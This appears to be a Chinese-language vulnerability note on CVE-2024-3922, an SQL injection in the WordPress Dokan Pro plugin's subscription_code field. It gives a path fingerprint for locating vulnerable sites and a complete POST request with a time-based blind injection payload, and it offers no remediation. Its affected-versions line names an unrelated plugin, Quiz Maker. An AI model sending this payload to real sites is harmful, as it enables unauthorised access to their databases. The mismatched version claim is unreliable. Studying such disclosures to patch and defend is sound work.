登录 白背景
源码

WordPress Dokan Pro插件subscription_code存在SQL注入漏洞(CVE-2024-3922)

<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>

<font style="color:rgb(38, 38, 38);">wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Dokan Pro插件subscription_code存在SQL注入漏洞</font>

<font style="color:rgb(38, 38, 38);">二、影响版本</font>

  • <font style="color:rgb(38, 38, 38);">WordPress Quiz Maker</font>

<font style="color:rgb(38, 38, 38);">三、资产测绘</font>

"/wp-content/plugins/dokan-pro/"
  • 特征

1716814370160-8f81d79d-f2bf-4fad-b39d-cc0a6c8b7eec.png

四、漏洞复现

POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip
 
{"env":"1","event":"invoice.created","resource":{"subscription_code":"' AND (SELECT 9155 FROM (SELECT(SLEEP(5)))JfFK) AND 'CKYA'='CKYA"}}

1719767152456-a54370bb-4a8c-4490-9d76-d945a6ea505e.png

原文: https://www.yuque.com/xiaokp7/ocvun2/wgghygghar8hbzv0